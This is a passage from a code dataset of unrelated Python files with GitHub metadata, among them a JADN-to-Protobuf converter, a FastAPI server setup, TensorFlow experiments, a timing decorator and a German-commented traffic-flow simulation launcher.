Utils.defaultDecode(self._custom)])\n )\n\n def formatStr(self, s):\n \"\"\"\n Formats the string for use in schema\n :param s: string to format\n :type s: str\n :return: formatted string\n :rtype str\n \"\"\"\n if s == '*':\n return 'unknown'\n else:\n return re.sub(r'[\\- ]', '_', s)\n\n def makeHeader(self):\n \"\"\"\n Create the header for the schema\n :return: header for schema\n :rtype str\n \"\"\"\n header = list([\n 'syntax = \"proto3\";',\n '',\n 'package {};'.format(re.sub(r'[.\\-/]+', '_', self._meta['module']) or 'JADN_ProtoBuf_Schema'),\n '',\n '/*'\n ])\n\n header.extend([' * meta: {} - {}'.format(k, re.sub(r'(^\\\"|\\\"$)', '', json.dumps(Utils.defaultDecode(v)))) for k, v in self._meta.items()])\n\n header.append('*/')\n\n return '\\n'.join(header) + '\\n\\n'\n\n def makeStructures(self):\n \"\"\"\n Create the type definitions for the schema\n :return: type definitions for the schema\n :rtype str\n \"\"\"\n tmp = ''\n for t in self._types:\n df = self._structFormats.get(t[1], None)\n\n if df is not None and t[1] in ['Record', 'Enumerated', 'Map', 'Array', 'ArrayOf']:\n tmp += df(t)\n\n elif df is not None:\n tmp += self._wrapAsRecord(df(t))\n\n return tmp\n\n def _wrapAsRecord(self, itm):\n \"\"\"\n wraps the given item as a record for the schema\n :param itm: item to wrap\n :type s: str\n :return: item wrapped as a record for hte schema\n :rtype str\n \"\"\"\n lines = itm.split('\\n')[1:-1]\n if len(lines) > 1:\n n = re.search(r'\\s[\\w\\d\\_]+\\s', lines[0]).group()[1:-1]\n tmp = \"\\nmessage {} {{\\n\".format(self.formatStr(n))\n for l in lines:\n tmp += '{}{}\\n'.format(self.indent, l)\n tmp += '}\\n'\n return tmp\n return ''\n\n def _fieldType(self, f):\n \"\"\"\n Determines the field type for the schema\n :param f: current type\n :return: type mapped to the schema\n :rtype str\n \"\"\"\n rtn = 'string'\n if re.search(r'(datetime|date|time)', f):\n if 'google/protobuf/timestamp.proto' not in self._imports:\n self._imports.append('google/protobuf/timestamp.proto')\n rtn = 'google.protobuf.Timestamp'\n\n if f in self._customFields:\n rtn = self.formatStr(f)\n\n elif f in self._fieldMap.keys():\n rtn = self.formatStr(self._fieldMap.get(f, f))\n return rtn\n\n def _formatComment(self, msg, **kargs):\n com = '//'\n if msg not in ['', None, ' ']:\n com += ' {msg}'.format(msg=msg)\n\n for k, v in kargs.items():\n com += ' #{k}:{v}'.format(\n k=k,\n v=json.dumps(v)\n )\n return com\n\n # Structure Formats\n def _formatRecord(self, itm):\n \"\"\"\n Formats records for the given schema type\n :param itm: record to format\n :return: formatted record\n :rtype str\n \"\"\"\n lines = []\n for l in itm[-1]:\n opts = {'type': l[2]}\n if len(l[-2]) > 0: opts['options'] = fopts_s2d(l[-2])\n\n lines.append('{idn}{type} {name} = {num}; {com}\\n'.format(\n idn=self.indent,\n type=self._fieldType(l[2]),\n name=self.formatStr(l[1]),\n num=l[0],\n com=self._formatComment('' if l[-1] == '' else l[-1], jadn_opts=opts)\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\nmessage {name} {{ {com}\\n{req}}}\\n'.format(\n name=self.formatStr(itm[0]),\n req=''.join(lines),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts)\n )\n\n def _formatChoice(self, itm):\n \"\"\"\n Formats choice for the given schema type\n :param itm: choice to format\n :return: formatted choice\n :rtype str\n \"\"\"\n lines = []\n for l in itm[-1]:\n opts = {'type': l[2]}\n if len(l[-2]) > 0: opts['options'] = fopts_s2d(l[-2])\n\n 
lines.append('{idn}{type} {name} = {num}; {com}\\n'.format(\n idn=self.indent,\n type=self._fieldType(l[2]),\n name=self.formatStr(l[1]),\n num=l[0],\n com=self._formatComment('' if l[-1] == '' else l[-1], jadn_opts=opts)\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\noneof {name} {{ {com}\\n{req}}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts),\n req=''.join(lines)\n )\n\n def _formatMap(self, itm):\n \"\"\"\n Formats map for the given schema type\n :param itm: map to format\n :return: formatted map\n :rtype str\n \"\"\"\n return self._formatRecord(itm)\n\n def _formatEnumerated(self, itm):\n \"\"\"\n Formats enum for the given schema type\n :param itm: enum to format\n :return: formatted enum\n :rtype str\n \"\"\"\n lines = []\n default = True\n for l in itm[-1]:\n if l[0] == 0: default = False\n lines.append('{idn}{name} = {num}; {com}\\n'.format(\n idn=self.indent,\n name=self.formatStr(l[1] or 'Unknown_{}_{}'.format(self.formatStr(itm[0]), l[0])),\n num=l[0],\n com='' if l[-1] == '' else self._formatComment(l[-1])\n ))\n\n opts = {'type': itm[1]}\n if len(itm[2]) > 0: opts['options'] = topts_s2d(itm[2])\n\n return '\\nenum {name} {{ {com}\\n{default}{enum}}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n com=self._formatComment('' if itm[-2] == '' else itm[-2], jadn_opts=opts),\n default='{}Unknown_{} = 0; // required starting enum number for protobuf3\\n'.format(self.indent, itm[0].replace('-', '_')) if default else '',\n enum=''.join(lines)\n )\n\n def _formatArray(self, itm): # TODO: what should this do??\n \"\"\"\n Formats array for the given schema type\n :param itm: array to format\n :return: formatted array\n :rtype str\n \"\"\"\n print('Array: {}'.format(itm))\n return ''\n\n def _formatArrayOf(self, itm): # TODO: what should this do??\n \"\"\"\n Formats arrayof for the given schema type\n :param itm: arrayof to format\n :return: formatted arrayof\n :rtype str\n \"\"\"\n\n opts = {\n 'type': 'arrayOf',\n 'options': topts_s2d(itm[2])\n }\n \n return '\\nmessage {name} {{\\n{idn}repeated {type} {field} = 1; {com}\\n}}\\n'.format(\n idn=self.indent,\n name=self.formatStr(itm[0]),\n type=self.formatStr(opts['options']['rtype']),\n field=self.formatStr(opts['options']['rtype']).lower(),\n com=self._formatComment('' if itm[-1] == '' else itm[-1], jadn_opts=opts)\n )\n\n\ndef proto_dumps(jadn):\n \"\"\"\n Produce Protobuf3 schema from JADN schema\n :arg jadn: JADN Schema to convert\n :type jadn: str or dict\n :return: Protobuf3 schema\n :rtype str\n \"\"\"\n return JADNtoProto3(jadn).proto_dump()\n\n\ndef proto_dump(jadn, fname, source=\"\"):\n with open(fname, \"w\") as f:\n if source:\n f.write(\"-- Generated from \" + source + \", \" + datetime.ctime(datetime.now()) + \"\\n\\n\")\n f.write(proto_dumps(jadn))\n","repo_name":"shiguangcheng/openc2-jadn-software","sub_path":"jadn/libs/convert/w_proto.py","file_name":"w_proto.py","file_ext":"py","file_size_in_byte":9959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"10328854141","text":"from settings import get_settings\nfrom bson.objectid import ObjectId\nimport pydantic\nimport uvicorn\nimport os\nfrom colorama import Fore\nfrom fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom uvicorn.config import LOGGING_CONFIG\n\nfrom database import 
close_db, connect_db\nfrom routers import executable, task, vm, error\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(executable.router)\napp.include_router(task.router)\napp.include_router(vm.router)\napp.include_router(error.router)\n\napp.mount(\n \"/executables\",\n StaticFiles(directory=get_settings().upload_directory),\n name=\"executable files\",\n)\n\n\n# https://github.com/encode/uvicorn/blob/master/uvicorn/config.py#L86\n# https://docs.python.org/3/library/logging.config.html#user-defined-objects\nLOGGING_CONFIG[\"filters\"] = {\"logendpointfilter\": {\"()\": \"logs.LogEndpointFilter\"}}\n# Override fastapi's formatters to use our pretty format\nLOGGING_CONFIG[\"formatters\"] = {\n \"default\": {\n \"()\": \"uvicorn.logging.DefaultFormatter\",\n \"fmt\": \"[%(asctime)s] <\"\n + Fore.CYAN\n + \"uvicorn\"\n + Fore.RESET\n + \">: %(message)s\",\n \"use_colors\": None,\n \"datefmt\": \"%H:%M:%S\",\n },\n \"access\": {\n \"()\": \"uvicorn.logging.AccessFormatter\",\n \"fmt\": \"[%(asctime)s] <\"\n + Fore.CYAN\n + \"http\"\n + Fore.RESET\n + '>: %(client_addr)s - \"%(request_line)s\" %(status_code)s',\n \"datefmt\": \"%H:%M:%S\",\n },\n}\nLOGGING_CONFIG[\"handlers\"][\"access\"][\"filters\"] = [\"logendpointfilter\"]\n\n\npydantic.json.ENCODERS_BY_TYPE[ObjectId] = str\n\n\n@app.get(\"/\")\nasync def root():\n return {\"hello\": \"world\"}\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await connect_db()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await close_db()\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", log_config=LOGGING_CONFIG)\n","repo_name":"TechSupportJosh/piav","sub_path":"api/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5358535689","text":"import requests\nimport xmltodict\n\nfrom study202208.practice.test import jiami\nclass TestApiRequest():\n req_data = {\n \"method\": \"get\",\n \"url\": \"http://127.0.0.1:9999/demo.txt\",\n \"headers\": None,\n \"encoding\": \"base64\"\n }\n def test_send(self):\n ar=jiami.ApiRequest()\n print(ar.send(self.req_data))\n\n def test_xml_to_dict(self):\n ar = jiami.ApiRequest()\n res=requests.get(\"https://www.nasa.gov/rss/dyn/lg_image_of_the_day.rss\")\n final_res=ar.response_to_dict(res)\n assert isinstance(final_res,dict)\n","repo_name":"Jocelin123/study202208","sub_path":"study202208/practice/test/test_jiami.py","file_name":"test_jiami.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7812044482","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport h5py, os\n\n\nrun_type = 'no_init'\nif run_type == 'init':\n var = tf.Variable(tf.random_uniform([2, 3]), name=\"var\")\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n print(sess.run(var))\n print(sess.run(init))\nif 1==0:\n def open_dataset(out_list, path, name, train_size, valid_size, test_size):\n usage = 'training'\n batch_size = 64\n sequence_length = 16\n\n # open dataset file\n _hdf5_file = h5py.File(os.path.join(path, name + '.h5'), 'r')\n _data_in_file = {\n data_name: _hdf5_file[usage][data_name] for 
data_name in out_list\n }\n limit = ({'training': train_size, 'validation': valid_size, 'test': test_size}[usage] or\n _data_in_file['features'].shape[1])\n\n # fix shapes and datatypes\n input_seq_len = 1 if _data_in_file['features'].shape[0] == 1 else sequence_length\n shapes = {\n data_name: (input_seq_len, batch_size, 1) + _data_in_file[data_name].shape[-3:]\n for data_name, data in _data_in_file.items()\n }\n shapes['idx'] = ()\n _dtypes = {data_name: tf.float32 for data_name in out_list}\n _dtypes['idx'] = tf.int32\n\n # set up placeholders for inserting data into queue\n _data_in = {\n data_name: tf.placeholder(_dtypes[data_name], shape=shape)\n for data_name, shape in shapes.items()\n }\n\n k = get_feed_data(_data_in, _data_in_file, sequence_length, start_idx=0)\n\n print(k)\n\n def get_feed_data(_data_in, _data_in_file, sequence_length, start_idx):\n batch_size = 64\n feed_dict = {_data_in[data_name]: ds[:sequence_length, start_idx:start_idx + batch_size][:, :, None]\n for data_name, ds in _data_in_file.items()}\n feed_dict[_data_in['idx']] = start_idx\n return feed_dict\n open_dataset(out_list= ('features', 'groups'), path = './data', name = 'shapes', train_size = None, valid_size=1000, test_size = None)\n\nif 1==0:\n class InputPipeLine(object):\n def _open_dataset(self, out_list, path, name, train_size, valid_size, test_size):\n # open dataset file\n self._hdf5_file = h5py.File(os.path.join(path, name + '.h5'), 'r')\n self._data_in_file = {\n data_name: self._hdf5_file[self.usage][data_name] for data_name in out_list\n }\n self.limit = ({'training': train_size, 'validation': valid_size, 'test': test_size}[self.usage] or\n self._data_in_file['features'].shape[1])\n\n # fix shapes and datatypes\n input_seq_len = 1 if self._data_in_file['features'].shape[0] == 1 else self.sequence_length\n self.shapes = {\n data_name: (input_seq_len, self.batch_size, 1) + self._data_in_file[data_name].shape[-3:]\n for data_name, data in self._data_in_file.items()\n }\n self.shapes['idx'] = ()\n self._dtypes = {data_name: tf.float32 for data_name in out_list}\n self._dtypes['idx'] = tf.int32\n\n # set up placeholders for inserting data into queue\n self._data_in = {\n data_name: tf.placeholder(self._dtypes[data_name], shape=shape)\n for data_name, shape in self.shapes.items()\n }\n\n\n def __init__(self, usage, shuffle, batch_size, sequence_length, queue_capacity, _rnd, out_list=('features', 'groups')):\n self.usage = usage\n self.shuffle = shuffle\n self.sequence_length = sequence_length\n self.batch_size = batch_size\n self._rnd = _rnd\n self.samples_cache = {}\n\n with tf.name_scope(\"{}_queue\".format(usage[:5])):\n\n self._open_dataset(out_list)\n\n # set up queue\n self.queue = tf.FIFOQueue(capacity=queue_capacity,\n dtypes=[v for k, v in sorted(self._dtypes.items(), key=lambda x: x[0])],\n shapes=[v for k, v in sorted(self.shapes.items(), key=lambda x: x[0])],\n names=[k for k in sorted(self._dtypes)])\n\n self._enqueue_op = self.queue.enqueue(self._data_in)\n\n # set up outputs of queue (inputs for the model)\n self.output = self.queue.dequeue()\n if self.shapes['features'][0] == 1 and self.sequence_length > 1:\n # if the dataset has sequence length 1 we need to repeat the data\n reshaped_output = {data_name: tf.tile(self.output[data_name], [self.sequence_length, 1, 1, 1, 1, 1])\n for data_name in out_list}\n reshaped_output['idx'] = self.output['idx']\n self.output = reshaped_output\n\n def get_feed_data(self, start_idx):\n feed_dict = {self._data_in[data_name]: ds[:self.sequence_length, 
start_idx:start_idx + self.batch_size][:, :, None]\n for data_name, ds in self._data_in_file.items()}\n feed_dict[self._data_in['idx']] = start_idx\n return feed_dict\n\n def get_debug_samples(self, samples_list, out_list=None):\n samples_key = tuple(samples_list)\n if samples_key in self.samples_cache:\n return self.samples_cache[samples_key]\n\n out_list = self._data_in_file.keys() if out_list is None else out_list\n results = {}\n for data_name in out_list:\n data = self._hdf5_file[self.usage][data_name][:, samples_list][:, :, None]\n if data.shape[0] == 1 and self.sequence_length > 1:\n data = np.repeat(data, self.sequence_length, axis=0)\n elif data.shape[0] > self.sequence_length:\n data = data[:self.sequence_length]\n results[data_name] = data\n\n self.samples_cache[samples_key] = results\n return results\n\n def get_batch_start_indices(self):\n idxs = np.arange(0, self.limit - self.batch_size, step=self.batch_size)\n if self.shuffle:\n self._rnd.shuffle(idxs)\n return 0, idxs\n\n def enqueue(self, session, coord):\n i, idxs = self.get_batch_start_indices()\n try:\n while not coord.should_stop():\n if i >= len(idxs):\n i, idxs = self.get_batch_start_indices()\n session.run(self._enqueue_op, feed_dict=self.get_feed_data(idxs[i]))\n i += 1\n except Exception as e:\n coord.request_stop(e)\n finally:\n self._hdf5_file.close()\n\n def get_n_batches(self):\n return self.limit // self.batch_size\n\n\nif 1==0:\n features = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\n department_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\n department_column = tf.feature_column.indicator_column(department_column)\n\n columns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n ]\n\n inputs = tf.feature_column.input_layer(features, columns)\n\n var_init = tf.global_variables_initializer()\n table_init = tf.tables_initializer()\n sess = tf.Session()\n result = sess.run((var_init, table_init))\n result = sess.run(inputs)\n print(result)\n\nif 1==0:\n x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32)\n y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32)\n\n # linear_model = tf.layers.dense(inputs=1, units=1)\n # y_pred = linear_model(x)\n y_pred = tf.layers.dense(inputs=x, units=1)\n loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n init = tf.global_variables_initializer()\n\n sess = tf.Session()\n sess.run(init)\n for i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n print(sess.run(y_pred))\n\nif 1==1:\n tf.logging.set_verbosity(tf.logging.INFO)\n\n\n def cnn_model_fn(features, labels, mode):\n \"\"\"Model function for CNN.\"\"\"\n # Input Layer\n # Reshape X to 4-D tensor: [batch_size, width, height, channels]\n # MNIST images are 28x28 pixels, and have one color channel\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n # Computes 32 features using a 5x5 filter with ReLU activation.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 28, 28, 1]\n # Output Tensor Shape: [batch_size, 28, 28, 32]\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n # First max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: 
[batch_size, 28, 28, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 32]\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2\n # Computes 64 features using a 5x5 filter.\n # Padding is added to preserve width and height.\n # Input Tensor Shape: [batch_size, 14, 14, 32]\n # Output Tensor Shape: [batch_size, 14, 14, 64]\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #2\n # Second max pooling layer with a 2x2 filter and stride of 2\n # Input Tensor Shape: [batch_size, 14, 14, 64]\n # Output Tensor Shape: [batch_size, 7, 7, 64]\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Flatten tensor into a batch of vectors\n # Input Tensor Shape: [batch_size, 7, 7, 64]\n # Output Tensor Shape: [batch_size, 7 * 7 * 64]\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n\n # Dense Layer\n # Densely connected layer with 1024 neurons\n # Input Tensor Shape: [batch_size, 7 * 7 * 64]\n # Output Tensor Shape: [batch_size, 1024]\n dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\n # Add dropout operation; 0.6 probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 10]\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n def main(unused_argv):\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n # train_data = mnist.train.images # Returns np.array\n # train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n # eval_data = mnist.test.images # Returns np.array\n # eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n train_data = np.random.rand(3, 28*28).astype(np.float32)\n train_labels = np.random.randint(low=0, high=10, size=(3,))\n eval_data = train_data\n eval_labels = train_labels\n\n # Create the Estimator\n mnist_classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/tmp/mnist_convnet_model\")\n\n # Set up logging for predictions\n # Log the values in the \"Softmax\" tensor with label \"probabilities\"\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, 
every_n_iter=50)\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": train_data},\n y=train_labels,\n batch_size=1,\n num_epochs=None,\n shuffle=True)\n mnist_classifier.train(\n input_fn=train_input_fn,\n steps=20,\n hooks=[logging_hook])\n\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=100,\n shuffle=False)\n eval_results = mnist_classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\n\n if __name__ == \"__main__\":\n tf.app.run()","repo_name":"shtechair/ndem","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":13941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35907517999","text":"from time import time\nimport logging\n\nfrom core.utils.time_utils import spent_time\n\nlogger = logging.getLogger()\n\n\ndef timing(func):\n def wrapper(*args, **kwargs):\n t1 = time()\n logger.info(f' >> {func.__name__}: Starts')\n result = func(*args, **kwargs)\n t2 = time()\n exec_time = spent_time(t1, t2)\n logger.info(f' >> {func.__name__}: Executed in {exec_time}')\n return result\n return wrapper\n","repo_name":"stAItuned/financial-sentiment-analysis","sub_path":"core/decorators/time_decorator.py","file_name":"time_decorator.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13852821392","text":"import numpy as np\nimport networkx as nx\nimport Math.data_manyPhases as data\nfrom Math.Application import Application\nfrom Graphics.AbfrageVirtuelleSpieler import AbfrageVirtuelleSpieler\nfrom shutil import copyfile\n\n\nclass Main:\n def __init__(self, graph, R, ST, alpha, variante, kanten_queue, start_queue, ende_queue, y0_queue):\n \"\"\"\n liest Parameter aus in Zeile 3 als \"data\" spezifizierter Datei ein und startet das Programm (also erzeugt eine\n \"Application\" und ruft deren \"runner\" Methode auf).\n :param graph: Gerichteter Graph als Dictionary, falls kein Graph spezifiziert, so wird Graph aus Datei\n \"GraphenGEXF/myGraph.gexf\" eingelesen\n :param R: Liste aller Startzeitpunkte, indiziert in der Reihenfolge der Spieler\n :param ST: Liste von Tupeln, wobei k-tes Tupel (i,j) beschreibt, dass Spieler k +1 Quelle s_i und Senke t_j\n besitzt\n :param alpha: aus Intervall [0,1]. 
Legt Gewichtung des Einflusses der Reise- und Wartezeiten auf die Kosten\n fest, beispielsweise:\n alpha = 0: nur die Reisedauer bestimmt Kosten\n alpha = 1: nur die Wartezeit bestimmt Kosten\n alpha = 1/2 (Standardwert): Reisedauer und Wartezeit nehmen gleichen Einfluss auf Kosten\n :param variante: gibt Variante zur Kostenberechnung an; Möglichkeiten: 'A' (standard), 'B', 'C', 'D'\n :param kanten_queue: Liste, die alle Kanten mit virtueller Warteschlange, als Tupel der Form ('v','w'), enthält\n :param start_queue: Liste die zu den Einträgen in 'kanten_queue' die entsprechenden Startzeitpunkte des\n virtuellen Einflusses enthält (i-ter Eintrag in 'start_queue' bezieht sich auf i-ten Eintrag in 'kanten_queue'\n :param ende_queue: Analog zu 'start_queue' ist dies eine Liste, die die Endzeitpunkte des virtuellen Einflusses\n enthält\n :param y0_queue: Liste mit den Einflussgrößen des virtuellen Flusses, indiziert wie 'kanten_queue',\n 'start_queue', 'ende_queue'\n \"\"\"\n self.R = R\n self.ST = ST\n self.alpha = alpha\n self.variante = variante\n self.kanten_queue = kanten_queue\n self.start_queue = start_queue\n self.ende_queue = ende_queue\n self.y0_queue = y0_queue\n\n if graph is None: # liest Graph aus \"GraphenGEXF/myGraph.gexf\", falls keiner in \"Math/data.py\" angegeben ist\n self.graph, self.posit = self.import_gexf_graph()\n else:\n self.graph = graph\n self.posit = nx.shell_layout(self.graph) # verwende vorgefertigtes Layout für angegebene Graphen\n\n # erzeuge Anwendung\n self.app = Application(self.graph, self.R, self.ST, self.alpha, self.posit, self.variante, self.kanten_queue,\n self.start_queue, self.ende_queue, self.y0_queue)\n\n self.query = AbfrageVirtuelleSpieler(self.app.button_win.master, self.app.E) # erzeuge Abfragefenster\n self.query.btn_start.configure(command=self.start_runner)\n\n self.app.button_win.mainloop()\n\n @staticmethod\n def import_gexf_graph():\n \"\"\"\n Funktion zum Einlesen eines Graphen aus einer .gexf Datei\n :return: graph: gerichteter Graph als Dictionary,\n posit: Knotenpositionen als passende Koordinaten\n \"\"\"\n\n # Funktion aus 'shutil', erzeugt Kopie von 'myGraph.gexf')\n copyfile(\"GraphenGEXF/myGraph.gexf\", \"GraphenGEXF/myGraph.gexf\" + \"~\")\n\n # füge Ausdruck 'defaultedgetype=\"directed\"' zu 'myGraph.gexf' hinzu (falls noch nicht vorhanden), da sonst\n # Kantenorientierung nicht beachtet wird\n source = open( \"GraphenGEXF/myGraph.gexf\" + \"~\", \"r\")\n gexfstring = source.read()\n if \"defaultedgetype=\\\"directed\\\"\" not in gexfstring[:500]:\n destination = open( \"GraphenGEXF/myGraph.gexf\", \"w\" )\n print(\"string:\", gexfstring)\n gexfstring1, gexfstring2 = gexfstring.split(\"graph mode=\\\"static\\\"\")\n destination.write(gexfstring1 + \"graph mode=\\\"static\\\" defaultedgetype=\\\"directed\\\"\" + gexfstring2)\n destination.close()\n source.close()\n\n G = nx.read_gexf(\"GraphenGEXF/myGraph.gexf\")\n nodes = G.nodes()\n edges = G.edges()\n graph = {}\n posit = {}\n # folgende Werte werden verwendet um Koordinaten passend zu transformieren\n x_min, x_max, y_min, y_max = 1, 1, 1, 1\n for v in nodes:\n graph[nodes[v]['label']] = {}\n x = nodes[v]['viz']['position']['x'] # x- und y-Position von Knoten v\n y = nodes[v]['viz']['position']['y']\n if abs(x) > x_max: # merke betraglich größte Koordinaten\n x_max = abs(x)\n if abs(y) > y_max:\n y_max = abs(y)\n posit[nodes[v]['label']] = np.array([x, y])\n for m in edges:\n if m[0] == v:\n cap_trav = edges[m]['label'].split(\"/\")\n # speichern der Kapazität und der 
Reisezeit von Kante m, entnommen aus der .gexf-Datei\n graph[nodes[v]['label']][nodes[m[1]]['label']] = (int(cap_trav[0]), int(cap_trav[1]))\n # x_max, bzw. y_max beschreiben nun die betraglich größte x- bzw. y-Koordinate\n # mit Hilfe dieser werden nun die Koordinaten aller Knotenpositionen auf das Intervall [-1,1]^2 transformiert\n for v in nodes:\n posit[nodes[v]['label']][0] = posit[nodes[v]['label']][0]/x_max\n posit[nodes[v]['label']][1] = posit[nodes[v]['label']][1]/y_max\n return graph, posit\n\n def start_runner(self):\n \"\"\"\n Funktion zum Starten der Anwendung \"self.app\". Wird dem Button \"btn_start\" des Abfragefensters zugewiesen.\n Fügt der Anwendung \"self.app\" alle über das Abfragefenster \"self.query\" eingelesenen Daten virtueller Spieler\n hinzu.\n :return: Kein Rückgabewert\n \"\"\"\n for v in range(len(self.query.add_at)): # aktualisiere Listen der Daten für virtuelle Spieler\n self.app.kanten_queue.append(self.query.add_at[v])\n self.app.start_queue.append(self.query.add_start[v])\n self.app.ende_queue.append(self.query.add_end[v])\n self.app.y0_queue.append(self.query.add_y0[v])\n\n # aktiviere alle Buttons\n self.app.button_win.prev.config(state=\"normal\")\n self.app.button_win.pause.config(state=\"normal\")\n self.app.button_win.nex.config(state=\"normal\")\n self.app.run(0) # Fluss zum Zeitpunkt 0 nach eventuellem Einfügen virtueller Spieler\n # starte 'app.runner()', diese Funktion sorgt für den wiederholten Aufruf von 'app.run()'\n self.app.button_win.after(1000, self.app.runner)\n self.query.abfrage.destroy()\n self.app.unpaused = True\n return\n\n\ndef main():\n try:\n data.R\n data.ST\n except AttributeError:\n raise AttributeError('\\'R\\' und \\'ST\\' müssen in \\'data.py\\' in jedem Fall angegeben werden')\n try:\n graph = data.graph\n except AttributeError:\n graph = None\n try:\n alpha = data.alpha\n except AttributeError:\n # falls 'alpha' nicht spezifiziert, verwende Standardwert 1/2 für alle Spieler\n alpha = len(data.R) * [1/2]\n try:\n variante = data.variante\n except AttributeError:\n # falls 'variante' nicht spezifiziert, verwende Standardwert 'A'\n variante = 'A'\n try:\n kanten_queue = data.kanten_queue\n start_queue = data.start_queue\n ende_queue = data.ende_queue\n y0_queue = data.y0_queue\n except AttributeError:\n kanten_queue = []\n start_queue = []\n ende_queue = []\n y0_queue = []\n\n Main(graph,data.R,data.ST,alpha,variante,kanten_queue,start_queue,ende_queue,y0_queue)\n return 0\n\n\nmain()\n","repo_name":"GraffL/ide-repository","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"de","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"7893879522","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n# \n# @param root TreeNode类 \n# @param sum int整型 \n# @return 